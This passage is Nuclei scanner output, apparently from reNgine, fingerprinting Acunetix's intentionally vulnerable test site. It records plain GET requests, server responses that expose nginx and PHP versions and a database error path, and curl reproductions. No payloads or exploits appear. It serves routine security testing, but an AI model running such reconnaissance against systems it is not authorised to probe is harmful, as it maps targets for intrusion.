Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.517448025Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.517473377Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.517499237Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.517507851Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.553530768Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.582515069Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.820476973Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.820510583Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.973453023Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:56 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many 